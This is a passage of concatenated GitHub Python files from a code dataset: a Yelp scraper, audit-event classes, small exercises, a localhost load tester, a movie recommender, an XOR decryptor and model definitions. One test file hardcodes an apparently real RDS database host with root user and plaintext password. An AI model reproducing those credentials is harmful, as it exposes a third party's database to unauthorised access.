\\\n 'for the top result \"{1}\" ...'.format(\n len(businesses), business_id))\n response = get_business(bearer_token, business_id)\n l.append(response)\n\n # This part is to get review details. \n\n print(u'{0} businesses found, querying review info ' \\\n 'for the top result \"{1}\" ...'.format(\n len(businesses), business_id))\n response = get_business_review(bearer_token, business_id)\n temp = business_id +\",\"+str(response)\n l.append(temp)\n\ndef query_api_business(business_id):\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n \n \"\"\"Queries the API by the input values from the user.\n\n Args:\n term (str): The search term to query.\n location (str): The location of the business to query.\n \"\"\"\n \n print(u'querying review info ' \\\n 'for the top result \"{0}\" ...'.format(\n business_id))\n response = get_business_review(bearer_token, business_id)\n temp = business_id +\",\"+str(response)\n l.append(temp)\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-q', '--term', dest='term', default=DEFAULT_TERM,\n type=str, help='Search term (default: %(default)s)')\nparser.add_argument('-l', '--location', dest='location',\n default=DEFAULT_LOCATION, type=str,\n help='Search location (default: %(default)s)')\n\ninput_values = parser.parse_args()\n\n# known issue: if the api returns till the end but the offset is still less than the limit,\n# it won't automatically break. You will need to manually interrupt. (To be fixed in the future)\n#while OFFSET < 1000:\n# try:\n# query_api(input_values.term, input_values.location)\n# except HTTPError as error:\n# sys.exit(\n# 'Encountered HTTP error {0} on {1}:\\n {2}\\nAbort program.'.format(\n# error.code,\n# error.url,\n# error.read(),\n# )\n# )\n# time.sleep(30.0)\n# OFFSET = OFFSET + 50\n\ncounter = 0\nfor b in BU: \n try:\n query_api_business(b)\n counter += 1\n if counter%50 == 0:\n time.sleep(30)\n except HTTPError as error:\n sys.exit(\n 'Encountered HTTP error {0} on {1}:\\n {2}\\nAbort program.'.format(\n error.code,\n error.url,\n error.read(),\n )\n )\n\n#save list (utf8 encoding)\ntoday = datetime.datetime.today()\noutputname = \"json_restaurant_review_\"+str(today).replace(':','-')+\".csv\"\nwith open(outputname, 'wb') as f:\n for item in l:\n f.write(item.encode('utf-8'))\n f.write(\"\\n\")","repo_name":"mekomlusa/bcsdineout","sub_path":"scripts/yelp_api_extract.py","file_name":"yelp_api_extract.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27148013475","text":"# coding=utf-8\nfrom pytz import UTC\nfrom datetime import datetime\nfrom xml.sax.saxutils import escape as xml_escape\nfrom base64 import b64decode\nfrom zope.component import createObject\nfrom zope.component.interfaces import IFactory\nfrom zope.interface import implements, implementedBy\nfrom Products.CustomUserFolder.interfaces import IGSUserInfo\nfrom Products.CustomUserFolder.userinfo import userInfo_to_anchor\nfrom Products.GSAuditTrail import IAuditEvent, BasicAuditEvent, \\\n AuditQuery, event_id_from_data\nfrom Products.XWFCore.XWFUtils import munge_date\nfrom utils import profile_interface\n\nSUBSYSTEM = 'groupserver.ProfileAudit'\nimport logging\nlog = logging.getLogger(SUBSYSTEM) #@UndefinedVariable\n\nUNKNOWN = '0'\nSET_PASSWORD = '1'\nCHANGE_PROFILE = '2'\nREGISTER = '3'\nCREATE_USER = '4'\n# REQUEST_CONTACT = '5' # Now moved to gs.profile.contact\nclass ProfileAuditEventFactory(object):\n implements(IFactory)\n\n title=u'User Profile Audit-Event Factory'\n description=u'Creates a GroupServer audit event for profiles'\n\n def __call__(self, context, event_id, code, date,\n userInfo, instanceUserInfo, siteInfo, groupInfo = None,\n instanceDatum='', supplementaryDatum='', subsystem=''):\n\n if (code == SET_PASSWORD):\n event = SetPasswordEvent(context, event_id, date,\n userInfo, instanceUserInfo, siteInfo,\n instanceDatum, supplementaryDatum)\n elif (code == CHANGE_PROFILE):\n event = ChangeProfileEvent(context, event_id, date,\n userInfo, instanceUserInfo, siteInfo,\n instanceDatum, supplementaryDatum)\n elif (code == REGISTER):\n event = RegisterEvent(context, event_id, date,\n userInfo, instanceUserInfo, siteInfo,\n instanceDatum, supplementaryDatum)\n else:\n event = BasicAuditEvent(context, event_id, UNKNOWN, date,\n userInfo, instanceUserInfo, siteInfo, None,\n instanceDatum, supplementaryDatum, SUBSYSTEM)\n assert event\n return event\n\n def getInterfaces(self):\n return implementedBy(BasicAuditEvent)\n\nclass SetPasswordEvent(BasicAuditEvent):\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n SET_PASSWORD, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n retval = u'%s (%s) set password on %s (%s)' %\\\n (self.instanceUserInfo.name, self.instanceUserInfo.id,\n self.siteInfo.name, self.siteInfo.id)\n return retval\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n retval = u'Set password' % cssClass\n if self.instanceUserInfo.id != self.userInfo.id:\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\nclass ChangeProfileEvent(BasicAuditEvent):\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n CHANGE_PROFILE, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n old, new = self.get_old_new()\n fieldName = self.get_fieldname()\n retval = u'%s (%s) changed profile attribute %s (%s) of '\\\n u'%s (%s) from %s to %s on %s (%s)' %\\\n (self.userInfo.name, self.userInfo.id,\n fieldName, self.instanceDatum,\n self.instanceUserInfo.name, self.instanceUserInfo.id,\n old, new, self.siteInfo.name, self.siteInfo.id)\n return retval\n\n def get_old_new(self):\n retval = [b64decode(d).decode('utf-8')\n for d in self.supplementaryDatum.split(',')]\n assert len(retval) == 2\n return retval\n\n def get_fieldname(self):\n field = self.instanceDatum\n interface = profile_interface(self.context)\n fieldName = interface.get(field, '')\n fieldName = fieldName and fieldName.title\n return fieldName\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n old, new = self.get_old_new()\n retval = u'Profile-field '\\\n u'%s '\\\n u'changed to '\\\n u'%s (was '\\\n u'%s)' % \\\n (cssClass, self.instanceDatum, self.get_fieldname(),\n xml_escape(new), xml_escape(old))\n if self.instanceUserInfo.id != self.userInfo.id:\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\nclass RegisterEvent(BasicAuditEvent):\n \"\"\"Registration Event. The \"instanceDatum\" is the address used\n to create the new user.\n \"\"\"\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n REGISTER, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n retval = u'Registering a new user with address <%s>' %\\\n self.instanceDatum\n return retval\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n retval = u'Signed up, with address '\\\n u'%s' %\\\n (cssClass, self.instanceDatum)\n if ((self.instanceUserInfo.id != self.userInfo.id)\n and not(self.userInfo.anonymous)):\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\nclass CreateUserEvent(BasicAuditEvent):\n \"\"\"Administrator Creating a User Event.\n\n The \"instanceDatum\" is the address used to create the new user.\n \"\"\"\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n REGISTER, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n retval = u'Administrator %s (%s) creating a new user with '\\\n u'address <%s>' %\\\n (self.userInfo.name, self.userInfo.id, self.instanceDatum)\n return retval\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n retval = u'Created a user, with address '\\\n u'%s' %\\\n (cssClass, self.instanceDatum)\n if ((self.instanceUserInfo.id != self.userInfo.id)\n and not(self.userInfo.anonymous)):\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\n\nclass ProfileAuditer(object):\n def __init__(self, user):\n self.user = user\n self.userInfo = createObject('groupserver.LoggedInUser',user)\n self.instanceUserInfo = IGSUserInfo(user)\n self.siteInfo = createObject('groupserver.SiteInfo', user)\n\n self.queries = AuditQuery()\n\n self.factory = ProfileAuditEventFactory()\n\n def info(self, code, instanceDatum = '', supplementaryDatum = ''):\n d = datetime.now(UTC)\n eventId = event_id_from_data(self.userInfo,\n self.instanceUserInfo, self.siteInfo, code, instanceDatum,\n supplementaryDatum)\n\n e = self.factory(self.user, eventId, code, d,\n self.userInfo, self.instanceUserInfo, self.siteInfo, None,\n instanceDatum, supplementaryDatum, SUBSYSTEM)\n\n self.queries.store(e)\n log.info(e)\n\n","repo_name":"groupserver/Products.GSProfile","sub_path":"Products/GSProfile/profileaudit.py","file_name":"profileaudit.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9904104730","text":"# a program to count the number of votes\n# Xola GcwaBE\n# 26/04/2014\n# BLSXOL001\n\nprint(\"Independent Electoral Commission\")\nprint(\"--------------------------------\")\nprint(\"Enter the names of parties (terminated by DONE):\")\nparty=\" \" # initializing party\nvotes =[] # initializing votes - empty list\nwhile party!=\"DONE\": # setting sentinel = 'DONE'\n party=input() # get party the user votes for\n votes.append(party) # adding each party voted for into votes\nx = votes.index(\"DONE\") # finding the index of the sentinel\ndel votes[x] # deleting sentinel from list\nprint()\nprint(\"Vote counts:\")\nvpp = [] # intialize votes per party (vpp)\nfor vote in votes: \n if vote in vpp: # check if vote is in votes per party\n vote = 0 \n else:\n vpp.append(vote) # if not, add it tio the list: vvp\nvpp.sort() \nfor i in vpp: # sorting the vpp list alphabetically\n print(\"%-10s - %s\" % (i, votes.count(i))) \n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/blsxol001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34517047895","text":"import sys\n\nimport pkg_resources\n# from db_compare_1_0_0.db_compare_plugin import DbComparePlugin\nprint(sys.path)\nfrom db_compare_1_0_0.db_compare_plugin import DbComparePlugin\n\n\n\ndef create_plugin() -> DbComparePlugin:\n for entry_point in pkg_resources.iter_entry_points('db_compare_1_0_0.plugin'):\n return entry_point.load()()\n\n\ndef test_ref_plugin():\n p = create_plugin()\n print(p.home)\n\n\ndef test_plugin_run():\n p = create_plugin()\n p.run(databases=[\n {\"operate\": \"DumpIn\", \"database_info\": {\n \"host\": \"dev-03-instance-1.c9qe4y0vrvda.rds.cn-northwest-1.amazonaws.com.cn\",\n \"user\": \"root\",\n \"pwd\": \"8YTJWOuA7XRK17wRQnw4\",\n \"port\": 3306,\n \"database\": \"eclinical_edc_dev_863\"}, \"sql_file\": p.prepare_procedure},\n {\"operate\": \"DumpIn\", \"database_info\": {\n \"host\": \"dev-03-instance-1.c9qe4y0vrvda.rds.cn-northwest-1.amazonaws.com.cn\",\n \"user\": \"root\",\n \"port\": 3306,\n \"pwd\": \"8YTJWOuA7XRK17wRQnw4\",\n \"database\": \"eclinical_edc_dev_864\"}, \"sql_file\": p.prepare_procedure\n }])\n print(p.plugin_run_result)\n","repo_name":"thcpc/warden","sub_path":"plugins/db_compare/db_compare_1_0_0/integration_tests/test_db_compare_1_0_0.py","file_name":"test_db_compare_1_0_0.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74307231161","text":"from .Scene import Scene\nfrom .Button import NormalButton\nfrom .Constants import Constants\nfrom .Game import Game\nfrom .TextManager import BlinkableText\nimport pygame\n\nclass GameOverScene(Scene):\n \n def __init__(self, width, height, background_image_url):\n super().__init__(width, height, background_image_url)\n self.play_again_text = BlinkableText(Constants.PLAY_AGAIN_TEXT_POSITION, Constants.PLAY_AGAIN_TEXT_COLOR, Constants.PLAY_AGAIN_TEXT_SIZE, Constants.PLAY_AGAIN_TEXT_NAME, Constants.PLAY_AGAIN_TEXT)\n self.play_again_text.show = True\n self.background_image = background_image_url\n\n def init(self, player:str, game:Game):\n winner = game.getWinner()\n \n winner = 1 if game.player1_score == Constants.MAX_SCORE else 2\n if winner == int(player):\n print('you won')\n self.background_image = pygame.transform.scale(pygame.image.load(Constants.WIN_BACKGROUND_IMAGE).convert_alpha(), (Constants.SCREEN_WIDTH, Constants.SCREEN_HEIGHT))\n else:\n print('you lost')\n self.background_image = pygame.transform.scale(pygame.image.load(Constants.LOSE_BACKGROUND_IMAGE).convert_alpha(), (Constants.SCREEN_WIDTH, Constants.SCREEN_HEIGHT))\n\n def draw(self):\n self.surface.blit(self.background_image, (0, 0))\n self.play_again_text.render(self.surface)\n\n def update(self, **kwargs):\n player = int(kwargs.get('player'))\n game = kwargs.get('game')\n self.play_again_text.update()\n pygame.display.update()","repo_name":"jaeymax/rps","sub_path":"classes/GameOverScene.py","file_name":"GameOverScene.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24795129653","text":"from collections import defaultdict\n\nN = int(input())\nMOD = 10**9+7\n\nnglist = [\n \"?AGC\", \"AGC?\",\n \"A?GC\", \"AG?C\",\n \"GAC?\", \"?GAC\",\n \"ACG?\", \"?ACG\"\n]\nng = {}\nfor t in \"AGCT\":\n for n in nglist:\n ng[n.replace('?', t)] = 1\n\ndp = {\"TTT\": 1}\n\nfor i in range(N):\n ans = 0\n _dp = defaultdict(int)\n for k, v in dp.items():\n for t in \"AGCT\":\n s = k+t\n if s not in ng:\n _dp[s[1:]] += v\n ans = (ans+v) % MOD\n dp = _dp\n if i == (N-1):\n print(ans)\n","repo_name":"whisper0077/programming-contests","sub_path":"atcoder/ABC/122/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15930253638","text":"# Time: 2022/5/13 0013 15:39\r\n# import os\r\n# os.rename('templates/index.txt','templates/index.py')\r\n# import os, sys, subprocess, tempfile, time\r\n# EXEC = sys.executable\r\n#\r\n\r\n# from django.shortcuts import render, HttpResponse, redirect\r\n# f = open(\"templates/index.py\",\"r\")\r\n# data = f.read()\r\n# f.close()\r\n# print(data)\r\n#\r\n# def selenium(data):\r\n# data\r\n#\r\n# print\r\n\r\n\r\n# outdata = subprocess.check_output([EXEC, data], stderr=subprocess.STDOUT, timeout=5)\r\n# print('outdata:'+ outdata)\r\n\r\n# stderr=subprocess.STDOUT,\r\n# from demo1.flaskrun import index\r\n# index()\r\n\r\n# import openpyxl\r\n# from openpyxl import Workbook,load_workbook\r\n# from openpyxl.styles import *\r\n# import warnings\r\n# import re\r\n# import speedtest\r\n\r\n\r\n# 创建\r\n# with open('templates/url_test.txt', mode='r', encoding='utf-8') as f:\r\n# url = f.readlines()\r\n# # print(url)\r\n# print('------------------------------------')\r\n# pattern = r'(http(.*?)://(.+))'\r\n# # match = re.search(pattern, url)\r\n# # print(match.group())\r\n# print('------------------------------------')\r\n# for i in url:\r\n# match = re.search(pattern, i)\r\n# if match:\r\n# print(match.group())\r\n# os.remove('templates/url_test.txt')\r\n\r\n# # 测网速\r\n# network_speed_test = speedtest.Speedtest()\r\n# # 下载速度\r\n# download_speed = network_speed_test.download()\r\n# if download_speed > 1024 * 1024:\r\n# download_speed = round(network_speed_test.download() / 1024 / 1024, 3)\r\n# print(\"下载速度:\" + str(download_speed) + \" Mb/s\")\r\n# elif download_speed > 1024:\r\n# download_speed = round(network_speed_test.download() / 1024, 3)\r\n# print(\"下载速度:\" + str(download_speed) + \" Kb/s\")\r\n# else:\r\n# download_speed = round(download_speed, 3)\r\n# print(\"下载速度:\" + str(download_speed) + \" b/s\")\r\n#\r\n# # 上传速度\r\n# upload_speed = network_speed_test.upload()\r\n# if upload_speed > 1024 * 1024:\r\n# upload_speed = round(network_speed_test.upload() / 1024 / 1024, 3)\r\n# print(\"上传速度:\" + str(upload_speed) + \" Mb/s\")\r\n# elif upload_speed > 1024:\r\n# upload_speed = round(network_speed_test.upload() / 1024, 3)\r\n# print(\"上传速度:\" + str(upload_speed) + \" Kb/s\")\r\n# else:\r\n# upload_speed = round(upload_speed, 3)\r\n# print(\"上传速度:\" + str(upload_speed) + \" b/s\")\r\n\r\n# _thread.start_new_thread ( function, args[, kwargs] )\r\n# import _thread\r\n# import time\r\n#\r\n# # 为线程定义一个函数\r\n# def print_time( threadName, delay):\r\n# count = 0\r\n# while count < 5:\r\n# time.sleep(delay)\r\n# count += 1\r\n# print (\"%s: %s\" % ( threadName, time.ctime(time.time()) ))\r\n#\r\n# # 创建两个线程\r\n# try:\r\n# _thread.start_new_thread( print_time, (\"线程1\", 2, ) )\r\n# _thread.start_new_thread( print_time, (\"线程2\", 4, ) )\r\n# print('ok')\r\n# except:\r\n# print (\"Error: 无法启动线程\")\r\n#\r\n# while 1:\r\n# pass\r\n\r\n\r\n\r\nimport threading\r\nimport time\r\nimport requests\r\n\r\n\r\n# 成功\r\nsuccess = 0\r\n# 失败\r\nfail = 0\r\n# 开始时间\r\n\r\n\r\n\r\nclass myThread (threading.Thread):\r\n def __init__(self, name):\r\n threading.Thread.__init__(self)\r\n self.name = name\r\n\r\n def run(self):\r\n # 开始线程\r\n test()\r\n\r\n\r\n\r\n\r\ndef test():\r\n global success\r\n global fail\r\n resp = requests.get('http://127.0.0.1:8000/test')\r\n if resp.status_code == 200:\r\n success += 1\r\n else:\r\n fail += 1\r\n\r\n\r\n#线程数量\r\nthread_amout = 100\r\n\r\nprint('开始线程')\r\nprint('线程数量:',thread_amout)\r\n# 创建新线程列表\r\nthread_list = []\r\nfor i in range(thread_amout):\r\n thread_list.append(myThread(\"Thread\"))\r\n# 启动线程\r\nstart_time = time.time()\r\nfor thread in thread_list:\r\n thread.start()\r\n thread.join()\r\nend_time = time.time()\r\n\r\n# 成功率\r\nsuccess_rate = round(((success / thread_amout) * 100), 3)\r\n\r\n\r\n\r\nprint('线程结束')\r\nprint('success:', success)\r\nprint('fail:', fail)\r\nprint('成功率:' + str(success_rate) + '%')\r\nprint('开始时间:', start_time)\r\nprint('结束时间:', end_time)\r\nprint('总耗时:', str((end_time - start_time) * 1000), 'ms')\r\n\r\n\r\n","repo_name":"hahahayu/frontendProjects","sub_path":"web-automated-test-platform/demo1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23205861517","text":"import sys\nimport collections\n\ninput = sys.stdin.readline\n\nn, m = map(int, input().rstrip().split(' '))\nbasket = [list(map(int, input().rstrip().split(' '))) for _ in range(n)]\ncases = collections.deque([list(map(int, input().rstrip().split(' '))) for _ in range(m)])\ncloud = [[n, 1], [n, 2], [n - 1, 1], [n - 1, 2]]\nincrease_water_location = []\nDIAGONAL = [[-1, -1], [1, 1], [-1, 1], [1, -1]]\n\ndef is_diagonal(x, y):\n if x == -1 or y == -1:\n return False\n if x == n or y == n:\n return False\n return True\n\n\ndef move(direction):\n if direction == 1:\n for c in cloud:\n c[1] -= 1\n\n if c[1] == 0:\n c[1] = n\n\n elif direction == 2:\n for c in cloud:\n c[0] -= 1\n c[1] -= 1\n\n if c[0] == 0:\n c[0] = n\n if c[1] == 0:\n c[1] = n\n elif direction == 3:\n for c in cloud:\n c[0] -= 1\n if c[0] == 0:\n c[0] = n\n\n elif direction == 4:\n for c in cloud:\n c[0] -= 1\n c[1] += 1\n\n if c[0] == 0:\n c[0] = n\n if c[1] == n + 1:\n c[1] = 1\n elif direction == 5:\n for c in cloud:\n c[1] += 1\n if c[1] == n + 1:\n c[1] = 1\n\n elif direction == 6:\n for c in cloud:\n c[0] += 1\n c[1] += 1\n\n if c[0] == n + 1:\n c[0] = 1\n if c[1] == n + 1:\n c[1] = 1\n elif direction == 7:\n for c in cloud:\n c[0] += 1\n if c[0] == n + 1:\n c[0] = 1\n else:\n for c in cloud:\n c[0] += 1\n c[1] -= 1\n\n if c[0] == n + 1:\n c[0] = 1\n if c[1] == 0:\n c[1] = n\n\n\nwhile cases:\n direction, distance = cases.popleft()\n destroy_cloud_location = [[0 for _ in range(n)] for _ in range(n)]\n\n for _ in range(distance):\n move(direction)\n for c in cloud:\n x, y = c\n basket[x - 1][y - 1] += 1\n destroy_cloud_location[x - 1][y - 1] = 1\n increase_water_location.append([x - 1, y - 1])\n\n for location in cloud:\n x, y = location\n for delta in DIAGONAL:\n next_x = x - 1 + delta[0]\n next_y = y - 1 + delta[1]\n if is_diagonal(next_x, next_y) and basket[next_x][next_y] > 0:\n basket[x - 1][y - 1] += 1\n cloud = []\n for i in range(n):\n for j in range(n):\n\n if basket[i][j] >= 2 and destroy_cloud_location[i][j] == 0:\n cloud.append([i + 1, j + 1])\n basket[i][j] -= 2\nresult = 0\n\nfor b in basket:\n result += sum(b)\nprint(result)\n","repo_name":"alsdk3586/study-algorithm","sub_path":"12월/20211226/박다정/p_2.py","file_name":"p_2.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27965058000","text":"import numpy as np\nimport ast\nfrom transformers import AutoTokenizer, AutoModel\nimport torch\nfrom scipy.spatial.distance import cosine\nimport nltk\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nimport re\n\nclass recomendacion:\n def __init__(self):\n print(\"Inicializando motor de busqueda\")\n self.dic_tratado = {}\n with open('dic_tratado.txt', 'r') as f:\n contenido = f.read()\n # Convierte el contenido en un diccionario utilizando ast.literal_eval()\n self.dic_tratado = ast.literal_eval(contenido)\n self.generos={}\n with open('generos.txt', 'r') as f:\n contenido = f.read()\n # Convierte el contenido en un diccionario utilizando ast.literal_eval()\n self.generos = ast.literal_eval(contenido)\n self.emb_dic={}\n with open('embenddings.txt', 'r') as archivo:\n for linea in archivo:\n # Eliminar los espacios en blanco al principio y al final de la línea\n linea = linea.strip()\n # Separar la línea en el ID y el vector\n id, vector = linea.split(':')\n # Eliminar los espacios en blanco al principio y al final del ID y convertirlo a entero\n id = str(id.strip())\n # Convertir la cadena que representa al vector a una lista de números\n vector = [float(num) for num in vector.strip()[1:-1].split(',')]\n # Guardar el ID y el vector en el diccionario\n self.emb_dic[id] = vector\n self.dic={}\n with open('diccionario.txt', 'r') as f:\n contenido = f.read()\n # Convierte el contenido en un diccionario utilizando ast.literal_eval()\n self.dic = ast.literal_eval(contenido)\n # Cargar modelo pre-entrenado y tokenizador\n self.tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')\n self.model = AutoModel.from_pretrained('bert-base-uncased')\n # Enunciado a representar\n def calcular_similitud(self, enunciado):\n #Tokenizar enunciado y convertir a tensores\n inputs = self.tokenizer(enunciado, return_tensors='pt')\n tokens_tensor = inputs['input_ids']\n segments_tensor = inputs['token_type_ids']\n with torch.no_grad():\n outputs = self.model(tokens_tensor, segments_tensor)\n embeddings = outputs[0][:, 0, :]\n embeddings_list = [round(num.item(), 2) for num in embeddings[0]]\n # Asignar lista redondeada como valor del diccionario\n embending_enunciado = embeddings_list\n similitudes = {}\n #Calcular similitud\n #No borrar mas alla de este comentario!!!!!!!!!!1\n for key in self.emb_dic:\n similitud = np.dot(embending_enunciado, self.emb_dic[key]) / (np.linalg.norm(embending_enunciado) * np.linalg.norm(self.emb_dic[key]))\n similitud_re= round(similitud.item(), 2)\n similitudes[key]=similitud_re\n sim_ordenado = dict(sorted(similitudes.items(), key=lambda x: x[1], reverse=True))\n return sim_ordenado\n def recomendados(self,sim):\n recomendaciones = []\n i=0\n for key in sim:\n if i<10:\n recomendaciones.append(key)\n else:\n break\n i=i+1\n return recomendaciones\n def comparar_enunciados(self, enunciado):\n # Crear embedding del nuevo enunciado\n tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')\n model = AutoModel.from_pretrained('bert-base-uncased')\n inputs = tokenizer(enunciado, return_tensors='pt')\n tokens_tensor = inputs['input_ids']\n segments_tensor = inputs['token_type_ids']\n with torch.no_grad():\n outputs = model(tokens_tensor, segments_tensor)\n nuevo_emb = outputs[0][:, 0, :][0].numpy()\n # Comparar con embeddings existentes\n similitudes = {}\n maximo=0\n for key in self.emb_dic:\n i=0\n for palabra in enunciado.split():\n if palabra in self.dic_tratado[key]:\n i=i+1\n if i>maximo:\n maximo=i\n for key in self.emb_dic:\n similitud = 1 - cosine(nuevo_emb, self.emb_dic[key])\n i=0\n for palabra in enunciado.split():\n if palabra in self.dic_tratado[key]:\n i=i+1\n if i>0:\n similitudes[key] = (similitud/2)+(i/(2*maximo))\n else:\n similitudes[key] = similitud/2\n sim_ordenado = dict(sorted(similitudes.items(), key=lambda x: x[1], reverse=True))\n return sim_ordenado\n def procesar_enunciado(self, enunciado):\n # Tokenización\n tokens = nltk.word_tokenize(enunciado)\n\n # Eliminación de stopwords y puntuación\n stopwords_english = stopwords.words('english')\n punctuations = list(punctuation)\n clean_tokens = [token.lower() for token in tokens if token.lower() not in stopwords_english and token not in punctuations]\n\n # Eliminación de números\n clean_tokens = [re.sub('\\d', '', token) for token in clean_tokens]\n\n # Unión de tokens limpios en un solo string\n clean_enunciado = ' '.join(clean_tokens)\n return clean_enunciado\n def main(self):\n print(\"Calculando...\")\n #id=self.calcular_similitud()\n enunciado=\"children movies like toy story\"\n clean_enun=self.procesar_enunciado(enunciado)\n similitudes = self.comparar_enunciados(clean_enun)\n recomendaciones=self.recomendados(similitudes)\n #print(similitudes)\n\nrun=recomendacion()\nrun.main()\n","repo_name":"Edgar-Padilla/Peliculas-Tkinter","sub_path":"sysR.py","file_name":"sysR.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35525663551","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('users', '0016_auto_20160105_1801'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DarkLaunch',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('feature_tag', models.CharField(unique=True, max_length=50)),\n ('description', models.TextField()),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('companies', models.ManyToManyField(related_name='company_features', null=True, to='users.Company', blank=True)),\n ('created_by', models.ForeignKey(related_name='user_created_features', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Dark Launch Code',\n 'verbose_name_plural': 'Dark Launch Codes',\n },\n ),\n ]\n","repo_name":"pranaykhilari-tudip/wan-project","sub_path":"wantoo-mars/users/migrations/0017_darklaunch.py","file_name":"0017_darklaunch.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25154605184","text":"#!/usr/bin/python\ndef xor(input, key):\n l = len(key)\n j = len(input)\n return bytearray((\n (input[i] ^ key[i % l]) for i in range(0, j)\n ))\n\ninput = bytearray(open(\"encrypted.xor\", \"rb\").read())\nkey = bytearray(open(\"keyfile\",\"rb\").read())\noutput = xor(input, key)\nopen(\"decrypted.txt\", \"wb\").write(output)\n","repo_name":"spark1991z/routerboard","sub_path":"tools/xor_decrypt.py","file_name":"xor_decrypt.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"35801052212","text":"from datetime import datetime\n\nfrom . import db\n\n\nclass Patient(db.Model):\n __tablename__ = \"patient\"\n id = db.Column(db.Integer, primary_key=True)\n firstname = db.Column(db.String(45), nullable=False)\n lastname = db.Column(db.String(45), nullable=False)\n birtday = db.Column(db.String(10), nullable=False)\n sex = db.Column(db.String(10), nullable=False)\n name_father = db.Column(\n db.String(45), nullable=False, default=\"No informado\")\n name_mather = db.Column(\n db.String(45), nullable=False, default=\"No informado\")\n reference_telephone = db.Column(\n db.String(14), nullable=False, default=\"No informado\"\n )\n reference_contact = db.Column(\n db.String(45), nullable=False, default=\"No informado\")\n document = db.Column(db.String(45), unique=True, nullable=False)\n email = db.Column(db.String(45), nullable=True)\n marital_status = db.Column(\n db.String(45), nullable=False, default=\"Soltero\")\n profession = db.Column(db.String(45), nullable=False,\n default=\"No informado\")\n controlled_medicine = db.Column(\n db.String(255), nullable=False, default=\"No informado\"\n )\n blood_type = db.Column(db.String(45), nullable=False,\n default=\"No informado\")\n smoker = db.Column(db.Boolean, default=False)\n consumes_alcohol = db.Column(db.Boolean, default=False)\n drug_user = db.Column(db.Boolean, default=False)\n chronic_disease = db.Column(\n db.String(255), nullable=False, default=\"No informado\")\n allergies = 